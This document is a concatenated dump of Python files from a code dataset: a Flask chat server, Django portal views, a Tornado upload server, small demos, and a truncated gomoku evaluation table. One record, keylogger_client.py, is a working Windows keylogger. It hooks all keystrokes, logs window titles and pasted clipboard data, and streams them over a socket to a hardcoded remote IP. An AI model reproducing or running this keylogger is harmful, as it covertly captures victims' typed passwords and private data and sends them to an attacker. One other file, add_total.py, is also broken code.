ratatouille]\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"571016288","text":"import os\nimport requests\nimport datetime\n\nfrom flask import Flask, jsonify, render_template, request,json\nfrom flask_socketio import SocketIO, emit\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\nsocketio = SocketIO(app)\n\nclass Message:\n def __init__(self, displayname, message, channel):\n self.displayName = displayname\n self.message = message\n self.channel = channel\n self.msgDateTime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n def asdict(self):\n return {'displayName': self.displayName, 'message': self.message, 'channel': self.channel, 'msgDateTime':self.msgDateTime}\n\ntestDisplayName = \"test\"\n# testUser = User(testDisplayName)\nDisplayNames = {testDisplayName:[]}\n# DisplayNames = []\n\n\ntestChannel = \"test-channel\"\nChannels = {testChannel:[]}\n# Channels = [\"fun\",\"work\",\"school\"]\n# Channels = []\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@socketio.on('register user displayname')\ndef registerUserDisplayName(data):\n displayname = data[\"displayname\"]\n app.logger.debug(f'REGISTER USER DISPLAYNAME in register user displayname: {displayname}')\n # no error if already registered but don't add twice\n if displayname not in DisplayNames:\n app.logger.info(f'register user: {displayname}')\n # DisplayNames.append(data[\"displayname\"])\n # key is name and value is array of messages\n DisplayNames[displayname] = []\n \n\n@socketio.on('fetch channels')\ndef fetchChannels():\n channelNames = list(Channels.keys())\n app.logger.debug(f\"FETCH CHANNELS {channelNames}\")\n socketio.emit('channel list',channelNames)\n\n@socketio.on('create channel')\ndef createChannel(data):\n # no error if already there just emit\n channel = data['newchannel']\n app.logger.debug(f'CREATE CHANNEL: {channel}')\n app.logger.debug(f'existing Channels: {Channels.keys()}')\n if channel not in Channels:\n # Channels.append(data[\"newchannel\"])\n Channels[channel] = []\n channelNames = list(Channels.keys())\n app.logger.debug(f'emiting channelNames: {channelNames}')\n socketio.emit('channel list', channelNames)\n\n@socketio.on(\"display name create\")\ndef createDisplayName(data):\n app.logger.debug(\"DISPLAY NAME CREATE in createDisplayName\")\n #check if name exists already\n if data[\"displayname\"] in DisplayNames:\n message = f'Display name {data[\"displayname\"]} already in use'\n resp = {\"status\":\"fail\",\"message\":message}\n else:\n # DisplayNames.append(data[\"displayname\"])\n DisplayNames[data[\"displayname\"]] = []\n resp = {\"status\":\"success\",\"message\":data[\"displayname\"]}\n debugDisplayNames = list(DisplayNames.keys())\n app.logger.debug(f'display name create end: {debugDisplayNames}')\n socketio.emit('create display name results', resp)\n\n######messages\n\n@socketio.on(\"message create\")\ndef createMessage(data):\n newmessage = data[\"newmessage\"]\n displayname = newmessage[\"displayname\"]\n message = newmessage[\"messagetext\"]\n selectedchannel = newmessage[\"selectedchannel\"]\n app.logger.debug(f'MESSAGE GREATE creating message: {displayname}, {message}, {selectedchannel}')\n ###### calling for new message not working\n newMessage = Message(displayname, message, selectedchannel)\n DisplayNames[displayname].append(newMessage)\n Channels[selectedchannel].append(newMessage)\n # return the the new message\n messages = []\n # messages.append(newMessage.asdict())\n # return all messages\n for message in Channels[selectedchannel]:\n messages.append(message.asdict())\n app.logger.debug(f'MESSAGE CREATE message returning: {messages}')\n socketio.emit(\"messages to render\",messages)\n\n@socketio.on(\"fetch messages per channel\")\ndef fetchMessagesPerChannel(data):\n app.logger.debug(f'FETCH MESSAGES PER CHANNEL fetch per channel: {data}')\n app.logger.debug(f'FETCH MESSAGES PER CHANNEL current Channels: {Channels.keys()}')\n #return a list of message for a channel named in data\n\n ########need to test if data is a key in Channels\n if (data in Channels.keys()): \n app.logger.debug(\"found messages in channel\")\n # convert messages in channel to dict\n messages = []\n for message in Channels[data]:\n messages.append(message.asdict())\n app.logger.debug(f'messages sending {messages}')\n socketio.emit(\"messages to render\",messages)\n else:\n app.logger.debug(\"didn't find messages in channel\")\n #no messages for this channel\n errorObj = {status:\"Error fetching messages per channel\",channel:data}\n socketio.emit(\"error\", errorObj)\n\n@socketio.on(\"clear server cache\")\ndef clearServerCache():\n DisplayNames = {}\n Channels = {}\n app.logger.debug(f\"cache cleared {DisplayNames} {Channels}\" )\n socketio.emit(\"remove all messages\")\n\n\n\n@socketio.on(\"delete messages per displayname\")\ndef deleteMessagesPerDisplayName(data):\n app.logger.debug(f'DELETING MESSAGES PER DISAPLYNAME {data}')\n\n displayName = data[\"displayname\"]\n selectedChannel = data[\"selectedchannel\"]\n app.logger.debug(f'DELETING MESSAGES PER DISAPLYNAME deleting message for {displayName}')\n #remove messages from user list\n DisplayNames[displayName] = []\n \n # remove object from Channels\n for channel in Channels.keys():\n messages = Channels[channel]\n app.logger.debug(f'delete messages in Channels {messages}')\n for message in messages:\n if message.displayName == displayName:\n app.logger.debug(f'REMVING MESSAGE {message}')\n messages.remove(message)\n #only return data if there is a selected channel and then return the messages\n #associated with that channel\n if (len(selectedChannel)) > 0:\n app.logger.debug(f\"SENDING BACK messages in channel {selectedChannel}\")\n fetchMessagesPerChannel(selectedChannel)\n else: \n nomessages = []\n app.logger.debug(f\"SENDING BACK EMPTY messages because no channel selected\")\n socketio.emit(\"messages to render\",nomessages)\n #socketio.emit(\"remove messages for displayname\",displayName)\n\n\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"358997780","text":"# -*- coding:utf-8 -*- \n#numba_test.py\nfrom numba import jit\nfrom numpy import arange\n\n# jit装饰器告诉Numba编译函数\n# 当函数被调用时,Numba会把参数类型引入\n@jit\ndef sum2d(arr):\n M, N = arr.shape\n result = 0.0\n for i in range(M):\n for j in range(N):\n result += arr[i, j]\n return result\n\na = arange(9).reshape(3, 3)\nprint(sum2d(a))","sub_path":"demos/L3/numba_test.py","file_name":"numba_test.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"186700306","text":"'''\n--------------Outline----------------------\n\n(*)version 1\n\nCheck or Add\n\nif check ask year and month\nprint total\n\noption (0-5 to print specific)\noption (Q to quit() and A to add function)\nPrint option\n -Label_0(Incoming) total\n -Label_1(Necessaries) total\n -Label_2(Groceries) total\n -Label_3(Entertainment)total\n -Label_4(Miscellaneous)total\n -Add\n -Quit\n\n\nOpen the file read and print total\nIf not avalible, Creat a new one.\nInput Data If month change creat new month data\nSort by YYYY-MM\n\nAsk user print all lines?\nAsk user add new lines?\nSave and Close\n\n@ import DATE\n\n\n(*)version 2\n-GUI\n-percentage pie(visual info)\n@ import tkinter\n\n\n'''\n\n\n\nadd_total.txt = input('Input the file name which you want to edit.\\n--> ')\ntxt = input('Insert the sentence:\\n')\n\ntry:\n file = open(add_total.txt,'r+')\n\nexcept Exception as ERROR_info:\n print('The file calls {} is not exist.'.format(add_total.txt))\n print('would you like creat a new file?')\n\n while True:\n creat_require = input('(Y/N)')\n if creat_require in ['y','Y','no','Yes'] :\n file = open(add_total.txt,'w')\n file.write(txt)\n break\n elif creat_require in ['n','N','no','No']:\n break\n\n else:\n continue\n\nelse:\n\n file.write(txt)\n\nfile.close()\n\n\n","sub_path":"test_files/add_total.py","file_name":"add_total.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"176375995","text":"#coding=utf-8\nimport datetime\nfrom django.conf import settings\nfrom django.shortcuts import render\nfrom django.http.response import Http404\nfrom portal.models import *\nfrom portal.utils import convert_to_data_value, convert_to_view_value, remove_html_tag\n\n\ndef home(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n #load slide data\n slide_list = Slide.objects.get_enabled_slide()\n #load top data\n top_data_count = 10\n #load solution top data\n solution_list = list()\n solutions = Solution.objects.get_enabled_solution()\n counter = 0\n while counter < len(solutions):\n if counter == top_data_count:\n break\n solution_item = dict()\n solution_data = solutions[counter]\n solution_item['title'] = solution_data.title\n solution_item['sid'] = convert_to_view_value(solution_data.id)\n solution_list.append(solution_item)\n counter += 1\n\n #load product top data\n product_list = list()\n products = Product.objects.get_enabled_product()\n counter = 0\n while counter < len(products):\n if counter == top_data_count:\n break\n product_item = dict()\n product_data = products[counter]\n product_item['title'] = product_data.title\n product_item['pid'] = convert_to_view_value(product_data.id)\n product_list.append(product_item)\n counter += 1\n\n #load service top data\n service_list = list()\n services = Service.objects.get_enabled_service()\n counter = 0\n while counter < len(services):\n if counter == top_data_count:\n break\n service_item = dict()\n service_data = services[counter]\n service_item['title'] = service_data.title\n service_item['sid'] = convert_to_view_value(service_data.id)\n service_list.append(service_item)\n counter += 1\n\n #load partner top data\n partner_data_count = 8\n partner_list = list()\n partners = Partner.objects.get_partners()\n counter = 0\n while counter < len(partners):\n partner_item = dict()\n partner_data = partners[counter]\n partner_item['title'] = partner_data.title\n partner_item['website'] = partner_data.website\n partner_item['logo'] = partner_data.logo\n partner_list.append(partner_item)\n if counter == partner_data_count:\n break\n counter += 1\n\n #load customer top data\n customer_data_count = 8\n customer_list = list()\n customers = Customer.objects.get_all_customer()\n counter = 0\n while counter < len(customers):\n customer_item = dict()\n customer_data = customers[counter]\n customer_item['title'] = customer_data.title\n customer_item['logo'] = customer_data.logo\n customer_list.append(customer_item)\n if counter == customer_data_count:\n break\n counter += 1\n\n return render(\n request,\n 'home/home.html',\n generate_context(\n current='home',\n slides=slide_list,\n partner_list=partner_list,\n customer_list=customer_list,\n solution_list=solution_list,\n product_list=product_list,\n service_list=service_list,\n )\n )\n\n\ndef solution(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n solution_list = Solution.objects.get_enabled_solution()\n solutions = []\n for solution_item in solution_list:\n solution_id = convert_to_view_value(solution_item.id)\n solution_title = solution_item.title\n solution_subtitle = solution_item.subtitle\n solution_data = {\n 'solution_id': solution_id,\n 'solution_title': solution_title,\n 'solution_subtitle': solution_subtitle,\n }\n solutions.append(solution_data)\n\n return render(\n request,\n 'solution/solution.html',\n generate_context(\n current='solution',\n solutions=solutions\n )\n )\n\n\ndef solution_detail(request, solution_id):\n \"\"\"\n :param request:\n :param solution_id:\n :return:\n \"\"\"\n solution_id = convert_to_data_value(solution_id)\n solution_item = Solution.objects.get_solution_by_id(solution_id)\n if not solution_item:\n raise Http404\n #获取关键词\n solution_keywords = solution_item.keyword\n #获取内容\n solution_content_list = SolutionContent.objects.get_content_by_solution_id(solution_id)\n #获取相关信息\n #获取相关产品\n solution_product_list = SolutionProduct.objects.get_product_by_solution_id(solution_id)\n product_list = list()\n customer_list = list()\n partner_list = list()\n for solution_product_item in solution_product_list:\n product_id = solution_product_item.product.id\n product_item = Product.objects.get_product_by_id(product_id)\n if not product_item:\n solution_product_item.delete()\n if product_item.enable == 0:\n continue\n #获取相关用户\n product_customer_list = ProductCustomer.objects.get_customer_by_product_id(product_id)\n for product_customer_item in product_customer_list:\n customer_item = product_customer_item.customer\n #检查重复项\n if customer_item not in customer_list:\n customer_list.append(customer_item)\n product_item.id = convert_to_view_value(product_item.id)\n product_list.append(product_item)\n #获取相关合作伙伴\n partner_item = product_item.partner\n if partner_item not in partner_list and partner_item:\n partner_list.append(partner_item)\n\n return render(\n request,\n 'solution/solution_detail.html',\n generate_context(\n current='solution',\n solution_item=solution_item,\n solution_content_list=solution_content_list,\n product_list=product_list,\n product_count=len(product_list),\n customer_list=customer_list,\n customer_count=len(customer_list),\n partner_list=partner_list,\n partner_count=len(partner_list),\n keywords=solution_keywords,\n )\n )\n\n\ndef product(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n product_list = Product.objects.get_enabled_product()\n products = list()\n for product_item in product_list:\n product_id = convert_to_view_value(product_item.id)\n product_title = product_item.title\n product_subtitle = product_item.subtitle\n product_partner = product_item.partner\n product_data = {\n 'product_id': product_id,\n 'product_title': product_title,\n 'product_subtitle': product_subtitle,\n 'product_partner': product_partner,\n }\n products.append(product_data)\n return render(\n request,\n 'product/product.html',\n generate_context(\n current='product',\n products=products,\n )\n )\n\n\ndef product_detail(request, product_id):\n \"\"\"\n :param request:\n :param product_id:\n :return:\n \"\"\"\n product_id = convert_to_data_value(product_id)\n product_item = Product.objects.get_product_by_id(product_id)\n if not product_item:\n raise Http404\n keywords = product_item.keyword\n #获取内容\n product_content_list = ProductContent.objects.get_content_by_product_id(product_id)\n #获取相关方案\n solution_product_list = SolutionProduct.objects.get_solution_by_product_id(product_id)\n solution_list = []\n for solution_product_item in solution_product_list:\n solution_id = solution_product_item.solution.id\n solution_item = Solution.objects.get_solution_by_id(solution_id)\n if not solution_item:\n solution_product_item.delete()\n if solution_item.enable == 0:\n continue\n solution_item.id = convert_to_view_value(solution_item.id)\n solution_list.append(solution_item)\n #获取相关客户信息\n product_customer_list = ProductCustomer.objects.get_customer_by_product_id(product_id)\n customer_list = []\n for product_customer_item in product_customer_list:\n customer = product_customer_item.customer\n customer_list.append(customer)\n\n return render(\n request,\n 'product/product_detail.html',\n generate_context(\n current='product',\n product_item=product_item,\n keywords=keywords,\n solution_list=solution_list,\n solution_count=len(solution_list),\n product_content_list=product_content_list,\n customer_list=customer_list,\n customer_count=len(customer_list)\n )\n )\n\n\ndef service(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n #load enabled service\n service_list = Service.objects.get_enabled_service()\n services = list()\n for service_item in service_list:\n service_id = convert_to_view_value(service_item.id)\n service_title = service_item.title\n service_sketch = service_item.sketch\n service_data = {\n 'service_id': service_id,\n 'service_title': service_title,\n 'service_sketch': service_sketch,\n }\n services.append(service_data)\n return render(\n request,\n 'service/service.html',\n generate_context(\n current='service',\n services=services\n )\n )\n\n\ndef service_detail(request, service_id):\n \"\"\"\n :param request:\n :param service_id:\n :return:\n \"\"\"\n service_id = convert_to_data_value(service_id)\n service_item = Service.objects.get_service_by_id(service_id)\n if not service_item:\n raise Http404\n\n keywords = service_item.keyword\n\n return render(\n request,\n 'service/service_detail.html',\n generate_context(\n current='service',\n service_item=service_item,\n keywords=keywords\n )\n )\n\n\ndef download(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n return render(\n request,\n 'download/download.html',\n generate_context(\n current='download'\n )\n )\n\n\ndef partner(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n #load data\n partner_list = Partner.objects.get_partners()\n customer_list = Customer.objects.get_all_customer()\n return render(\n request,\n 'partner/partner.html',\n generate_context(\n current='partner',\n partner_list=partner_list,\n customer_list=customer_list,\n )\n )\n\n\ndef career(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n context = generate_context(current='career')\n return render(request, 'career/career.html', context)\n\n\ndef company(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n return render(\n request,\n 'company/company.html',\n generate_context(\n current='company'\n )\n )\n\n\ndef privacy(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n return render(\n request,\n 'company/privacy.html',\n generate_context(\n current='company'\n )\n )\n\n\ndef term(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n return render(\n request,\n 'company/term.html',\n generate_context(\n current='company'\n )\n )\n\n\ndef search(request):\n query = request.GET.get('s', '')\n #对GET到的字符串数据进行转码\n query = unicode(query).encode(encoding='utf-8')\n #移除查询关键词前后的空格\n query = query.strip()\n #将关键词按照空格分割成list\n query_list = query.split(' ')\n search_result = []\n #判断用户行为是否允许进行查询\n valid_rate = False\n valid_keyword = False\n #搜索频率是否正常\n if 'search' not in request.COOKIES:\n valid_rate = True\n #搜索词是否为空\n if not query == '':\n valid_keyword = True\n #开始进行查询\n if valid_rate and valid_keyword:\n #查询解决方案\n solution_result = Solution.objects.get_search(query_list)\n for solution_item in solution_result:\n solution_id = convert_to_view_value(solution_item.id)\n solution_title = solution_item.title\n solution_sketch = remove_html_tag(solution_item.sketch)\n if len(solution_sketch) > 100:\n solution_sketch = solution_sketch[0:100] + '...'\n result_item = {\n 'type': 'solution',\n 'id': solution_id,\n 'title': solution_title,\n 'sketch': solution_sketch,\n }\n search_result.append(result_item)\n\n #查询解决方案内容\n solution_content_result = SolutionContent.objects.get_search(query_list)\n #检查所属解决方案在查询结果是否已存在\n for solution_content_item in solution_content_result:\n solution_id = solution_content_item.solution.id\n exist = False\n for search_result_item in search_result:\n if search_result_item['type'] == 'solution' \\\n and search_result_item['id'] == convert_to_view_value(solution_id):\n exist = True\n break\n if not exist:\n solution_item = Solution.objects.get_solution_by_id(solution_id)\n if not solution_item:\n continue\n solution_id = convert_to_view_value(solution_id)\n solution_title = solution_item.title\n solution_sketch = solution_item.sketch\n solution_sketch = remove_html_tag(solution_sketch)\n if len(solution_sketch) > 100:\n solution_sketch = solution_sketch[0:100] + '...'\n result_item = {\n 'type': 'solution',\n 'id': solution_id,\n 'title': solution_title,\n 'sketch': solution_sketch\n }\n search_result.append(result_item)\n\n #查询产品\n product_result = Product.objects.get_search(query_list)\n for product_item in product_result:\n product_id = convert_to_view_value(product_item.id)\n product_title = product_item.title\n product_sketch = remove_html_tag(product_item.sketch)\n if len(product_sketch) > 100:\n product_sketch = product_sketch[0:100] + '...'\n result_item = {\n 'type': 'product',\n 'id': product_id,\n 'title': product_title,\n 'sketch': product_sketch,\n }\n search_result.append(result_item)\n\n #查询产品内容\n product_content_result = ProductContent.objects.get_search(query_list)\n #检查所属产品在查询结果是否已存在\n for product_content_item in product_content_result:\n product_id = product_content_item.product.id\n exist = False\n for search_result_item in search_result:\n if search_result_item['type'] == 'product' \\\n and search_result_item['id'] == convert_to_view_value(product_id):\n exist = True\n break\n if not exist:\n product_item = Product.objects.get_product_by_id(product_id)\n if not product_item:\n continue\n product_id = convert_to_view_value(product_id)\n product_title = product_item.title\n product_sketch = product_item.sketch\n product_sketch = remove_html_tag(product_sketch)\n if len(product_sketch) > 100:\n product_sketch = product_sketch[0:100] + '...'\n result_item = {\n 'type': 'product',\n 'id': product_id,\n 'title': product_title,\n 'sketch': product_sketch\n }\n search_result.append(result_item)\n\n #查询服务\n service_result = Service.objects.get_search(query_list)\n for service_item in service_result:\n service_id = convert_to_view_value(service_item.id)\n service_title = service_item.title\n service_sketch = remove_html_tag(service_item.sketch)\n if len(service_sketch) > 100:\n service_sketch = service_sketch[0:100] + '...'\n result_item = {\n 'type': 'service',\n 'id': service_id,\n 'title': service_title,\n 'sketch': service_sketch\n }\n search_result.append(result_item)\n\n #没有查询到数据的消息反馈\n #消息类型:\n #0:搜索频率过快\n #1:关键词为空\n #2:没有查询到结果\n message = ''\n search_result_count = len(search_result)\n if search_result_count == 0:\n search_result = None\n if not valid_rate:\n message = 0\n elif not valid_keyword:\n message = 1\n else:\n message = 2\n\n query_history = request.COOKIES.get('query_history')\n if not query_history or query_history == 'None':\n if not query == '':\n query_history = list()\n query_history.append(query)\n else:\n #将本次关键词加入搜索历史\n query_history = query_history.split(',')\n #遍历搜索历史的每一项,检查是否有与本次关键词完全一样的项目\n for i in range(0, len(query_history), 1):\n if query == query_history[i]:\n del query_history[i]\n break\n #不存在完全一样的项则将其加入搜索历史\n if not query == '':\n query_history.insert(0, query)\n #保持历史记录项目数量不超过6\n while len(query_history) > 6:\n del query_history[len(query_history)-1]\n\n #将cookie中取得的历史记录转换成list,该list将传递给页面模板\n history_list = query_history\n query_history = ','.join(query_history)\n\n response = render(\n request,\n 'search/search.html',\n generate_context(\n current='home',\n search_result=search_result,\n search_result_count=search_result_count,\n query=query,\n history_list=history_list,\n message=message\n )\n )\n #搜索历史保存在客户端本地Cookie\n response.set_cookie('search', max_age=1)\n #历史列表保存时间为2小时\n response.set_cookie('query_history', query_history, max_age=7200)\n\n return response\n\n\ndef h404(request):\n return render(\n request,\n 'common/http404.html',\n generate_context(\n current='home'\n )\n )\n\n\ndef h500(request):\n return render(\n request,\n 'common/http500.html',\n generate_context(\n current='home'\n )\n )\n\n\ndef generate_context(**contexts):\n \"\"\"\n 生成页面上下文信息\n :return:\n \"\"\"\n #获取传入的上下文\n input_context = dict(contexts)\n #获取DEBUG状态\n use_cdn = settings.USE_CDN\n #获取设置\n call_setting = GlobalSetting.objects.get_phone_setting()\n mail_setting = GlobalSetting.objects.get_mail_setting()\n keyword_setting = GlobalSetting.objects.get_keyword_setting()\n description_setting = GlobalSetting.objects.get_description_setting()\n #获取当前年份\n year = datetime.datetime.now().year\n #将数据装入页面上下文\n setting_context = {\n 'use_cdn': use_cdn,\n 'year': year,\n 'call_setting': call_setting,\n 'mail_setting': mail_setting,\n 'description_setting': description_setting,\n }\n context = dict(input_context.items() + setting_context.items())\n if ('keywords' in context) is False:\n context['keywords'] = keyword_setting\n else:\n if context['keywords'] == str():\n context['keywords'] = keyword_setting\n return context\n","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"287250058","text":"import click\nimport sys\n\n\n@click.command()\n@click.option('--opt')\n@click.argument('arg')\ndef hello(arg, opt):\n click.echo('Opt: {} Arg: {}'.format(opt, arg))\n\n\nif __name__ == '__main__':\n hello(sys.argv[1:])\n","sub_path":"sphinxcontrib/lpblocks/signon.py","file_name":"signon.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"273512185","text":"#!/usr/bin/env python\n'''\nFile: nodepy.py\nAuthor: George Ang <gnap.an@gmail.com>\nDescription:\n'''\n\nimport logging\n\nfrom tornado import ioloop\nfrom functools import partial\nfrom tornado.netutil import TCPServer\nfrom tornado.httputil import HTTPHeaders\nfrom tornado.httputil import _parse_header\n\nclass NodePy(object):\n\n def __init__(self, port):\n self._port = port\n\n def listen(self):\n self._server.listen(self._port)\n\n def stream(self, handle_stream):\n self._server = TCPServer()\n self._server.handle_stream = handle_stream\n return self\n\nclass StreamHandler(object):\n\n def __init__(self):\n self._headers = dict(Accept='*/*')\n\n def __call__(self, stream, request_uri, request_headers = None):\n pass\n\n\nclass HTTPStreamServer(object):\n\n def __call__(self, stream, address):\n\n _sample_length = 10240\n\n def on_header(data):\n #stream.write(data)\n lines = data.splitlines()\n if lines:\n method, uri, version = lines[0].split(\" \")\n headers = HTTPHeaders.parse(\"\\r\\n\".join(lines[1:]))\n if headers.get(\"Expect\") == \"100-continue\":\n stream.write(\"HTTP/1.1 100 (Continue)\\r\\n\\r\\n\")\n write_headers()\n content_length = headers.get(\"Content-Length\")\n content_type = headers.get(\"Content-Type\", \"\")\n if content_length and content_type:\n content_length = int(content_length)\n if content_type.startswith(\"multipart/form-data\"):\n fields = content_type.split(\";\")\n if len(fields) != 2:\n stream.close()\n k, sep, v = fields[1].strip().partition(\"=\")\n if k == 'boundary' and v:\n boundary = v\n stream.read_bytes(min(content_length, _sample_length + len(boundary)*2 + 210),\n partial(on_multipart, boundary=boundary))\n else:\n stream.close()\n\n else:\n stream.close()\n\n else:\n stream.close()\n\n def on_multipart(data, boundary):\n #stream.write('<'*8 + '\\r\\n')\n logging.debug('got data length:%s', len(data))\n eoh = data.find(boundary + '--')\n boundary_length = len(boundary) + 4\n logging.debug('got data eoh:%s', eoh)\n if eoh != -1:\n part = data[boundary_length:eoh]\n else:\n part = data[boundary_length:]\n\n logging.debug('got part length:%s', len(part))\n eoh = part.find(\"\\r\\n\\r\\n\")\n logging.debug('part header:\\n%s', part[:eoh])\n headers = HTTPHeaders.parse(part[:eoh].decode(\"utf-8\"))\n disp_header = headers.get(\"Content-Disposition\", \"\")\n content_type = headers.get(\"Content-Type\", \"\")\n disposition, disp_params = _parse_header(disp_header)\n value = part[eoh + 4: eoh + 4 + _sample_length]\n if not value:\n stream.close()\n return\n logging.debug('got value length:%s', len(value))\n filename = disp_params[\"filename\"]\n res = unicode('got filename:%s content-type:%s len:%s' % (filename, content_type, len(value)))\n logging.debug('got res :%s', res)\n stream.write(res.encode('utf-8'), on_write)\n #stream.write('\\r\\n' + '>'*8 )\n #stream.close()\n\n def on_write():\n stream.close()\n\n def write_headers():\n stream.write(\"\"\"HTTP/1.1 200 OK\\nAccept:*/*\\nContent-Type: text/html\\nTransfer-Encoding: chunked\\r\\n\\r\\n\"\"\")\n\n stream.read_until('\\r\\n\\r\\n', on_header)\n\nif __name__ == '__main__':\n NodePy(8810).stream(HTTPStreamServer()).listen()\n ioloop.IOLoop.instance().start()\n","sub_path":"app/core/nodepy.py","file_name":"nodepy.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"583642916","text":"# -*- coding: utf-8 -*- \nfrom ctypes import *\nimport pythoncom\nimport pyHook\nimport win32clipboard\nimport socket\n\nuser32 = windll.user32\nkernel32 = windll.kernel32\npsapi = windll.psapi\ncurrent_window = None\n\n# 用于运行server.py的地址IP/URL及端口\ntarget_host = \"192.168.160.156\"\ntarget_port = 8374\n\n#建立连接并监听\nclient = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nwhile True:\n\t#异常用于处理本机无网络时或者服务端未处于监听状态(简而言之就是无法建立连接时)而退出程序\n\ttry:\n\t\tclient.connect((target_host,target_port))\n\t\tbreak\n\texcept socket.error:\n\t\tcontinue\nclient.sendall(\"Request to connect!!\")\n\ndef get_current_process():\n\n\t# 获取最上层的窗口句柄\n\thwnd = user32.GetForegroundWindow()\n\n\t# 获取进程ID\n\tpid = c_ulong(0)\n\tuser32.GetWindowThreadProcessId(hwnd,byref(pid))\n\n\t# 将进程ID存入变量中\n\tprocess_id = \"%d\" % pid.value\n\n\t# 申请内存\n\texecutable = create_string_buffer(\"\\x00\"*512)\n\th_process = kernel32.OpenProcess(0x400 | 0x10,False,pid)\n\n\tpsapi.GetModuleBaseNameA(h_process,None,byref(executable),512)\n\n\t# 读取窗口标题\n\twindows_title = create_string_buffer(\"\\x00\"*512)\n\tlength = user32.GetWindowTextA(hwnd,byref(windows_title),512)\n\n\t# 打印\n\tclient.sendall(\"\\n[ PID:%s-%s-%s]\\n\" % (process_id,executable.value,windows_title.value))\n\n\t# 关闭handles\n\tkernel32.CloseHandle(hwnd)\n\tkernel32.CloseHandle(h_process)\n\n# 定义击键监听事件函数\ndef KeyStroke(event):\n\n\tglobal current_window\n\n\t# 检测目标窗口是否转移(换了其他窗口就监听新的窗口)\n\tif event.WindowName != current_window:\n\t\tcurrent_window = event.WindowName\n\t\t# 函数调用\n\t\tget_current_process()\n\n\t# 检测击键是否常规按键(非组合键等)\n\tif event.Ascii > 32 and event.Ascii <127:\n\t\tclient.sendall(chr(event.Ascii))\n\telse:\n\t\t# 如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来\n\t\tif event.Key == \"V\":\n\t\t\twin32clipboard.OpenClipboard()\n\t\t\tpasted_value = win32clipboard.GetClipboardData()\n\t\t\twin32clipboard.CloseClipboard()\n\t\t\tclient.sendall(\"[PASTE]-%s\" % (pasted_value))\n\t\telse:\n\t\t\tclient.sendall(\"[%s]\" % event.Key)\n\n\t# 循环监听下一个击键事件\n\treturn True\n\n# 创建并注册hook管理器\nkl = pyHook.HookManager()\nkl.KeyDown = KeyStroke\n\n# 注册hook并执行\nkl.HookKeyboard()\npythoncom.PumpMessages()","sub_path":"keylogger/keylogger_client.py","file_name":"keylogger_client.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"381745166","text":"from __future__ import print_function\nfrom pprint import pprint\nimport random\nimport pipe as P\nimport numpy as np\nfrom pipe import DEBUG_EVAL, DEBUG\nimport sys\nfrom easyAI import TwoPlayersGame, Human_Player, AI_Player, Negamax\nfrom easyAI import id_solve, TT\nimport numpy as np\nfrom easyAI import SSS\nfrom numba import jit\nimport pdb \nimport cProfile \ntype_table = {\n (1,1,1,1,1): 'l_5',\n\n (1,1,1,1,0): 'l_4c',\n (1,1,1,0,1): 'l_4',\n (1,1,0,1,1): 'l_4',\n (1,0,1,1,1): 'l_4',\n (0,1,1,1,1): 'l_4c',\n\n (0,0,1,1,1): 'l_3c',\n (0,1,0,1,1): 'l_3',\n (0,1,1,0,1): 'l_3',\n (0,1,1,1,0): 'l_3c',\n # (1,0,0,1,1): 'l_3',\n (1,0,1,0,1): 'l_3',\n (1,0,1,1,0): 'l_3',\n # (1,1,0,0,1): 'l_3',\n (1,1,0,1,0): 'l_3',\n (1,1,1,0,0): 'l_3c',\n\n (1,1,0,0,0): 'l_2c',\n (1,0,1,0,0): 'l_2',\n # (1,0,0,1,0): 'l_2',\n # (1,0,0,0,1): 'l_2',\n (0,1,1,0,0): 'l_2c',\n (0,1,0,1,0): 'l_2',\n # (0,1,0,0,1): 'l_2',\n (0,0,1,1,0): 'l_2c',\n (0,0,1,0,1): 'l_2',\n (0,0,0,1,1): 'l_2c',\n\n# ENEMY\n (2,2,2,2,2): 'b_5',\n\n (2,2,2,2,0): 'b_4c',\n (2,2,2,0,2): 'b_4',\n (2,2,0,2,2): 'b_4',\n (2,0,2,2,2): 'b_4',\n (0,2,2,2,2): 'b_4c',\n\n (0,0,2,2,2): 'b_3c',\n (0,2,0,2,2): 'b_3',\n (0,2,2,0,2): 'b_3',\n (0,2,2,2,0): 'b_3c',\n # (2,0,0,2,2): 'b_3',\n (2,0,2,0,2): 'b_3',\n (2,0,2,2,0): 'b_3',\n # (2,2,0,0,2): 'b_3',\n (2,2,0,2,0): 'b_3',\n (2,2,2,0,0): 'b_3c',\n\n (2,2,0,0,0): 'b_2c',\n (2,0,2,0,0): 'b_2',\n # (2,0,0,2,0): 